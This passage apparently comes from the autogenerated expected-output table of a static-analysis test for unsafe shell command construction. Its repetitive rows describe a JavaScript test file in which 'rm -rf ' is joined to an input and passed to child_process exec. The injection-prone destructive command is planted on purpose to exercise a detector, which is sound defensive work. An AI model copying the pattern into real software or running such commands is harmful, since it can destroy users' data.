name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:10:409:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:10:409:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:10:409:18 | "rm -rf " | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:10:409:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:10:409:18 | "rm -rf " | stringConcatenatedWith | -endpoint- sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:10:409:30 | "rm -rf ... nitized | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:10:409:30 | "rm -rf ... nitized | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:10:409:30 | "rm -rf ... nitized | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:10:409:30 | "rm -rf ... nitized | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:10:409:30 | "rm -rf ... nitized | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:10:409:30 | "rm -rf ... nitized | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:10:409:30 | "rm -rf ... nitized | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:10:409:30 | "rm -rf ... nitized | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:10:409:30 | "rm -rf ... nitized | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:22:409:30 | sanitized | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:22:409:30 | sanitized | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:22:409:30 | sanitized | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:22:409:30 | sanitized | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:22:409:30 | sanitized | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:22:409:30 | sanitized | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:7:412:8 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:7:412:8 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:7:412:8 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:7:412:35 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:7:412:35 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:7:412:35 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:7:412:35 | cp = re ... ocess") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:7:412:35 | cp = re ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:7:412:35 | cp = re ... ocess") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:12:412:18 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:12:412:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:12:412:18 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:12:412:35 | exceptional return of require ... ocess") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:12:412:35 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:12:412:35 | exceptional return of require ... ocess") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:12:412:35 | require ... ocess") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:12:412:35 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:12:412:35 | require ... ocess") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:20:412:34 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:20:412:34 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:20:412:34 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:20:412:34 | "child_process" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:20:412:34 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:20:412:34 | "child_process" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:7:413:11 | spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:7:413:11 | spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:7:413:11 | spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:7:413:11 | spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:7:413:22 | spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:7:413:22 | spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:7:413:22 | spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:7:413:22 | spawn = cp.spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:7:413:22 | spawn = cp.spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:7:413:22 | spawn = cp.spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:15:413:16 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:15:413:16 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:15:413:16 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:15:413:22 | cp.spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:15:413:22 | cp.spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:15:413:22 | cp.spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:18:413:22 | spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:18:413:22 | spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:413:18:413:22 | spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:1:414:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:1:414:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:1:414:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:1:414:14 | 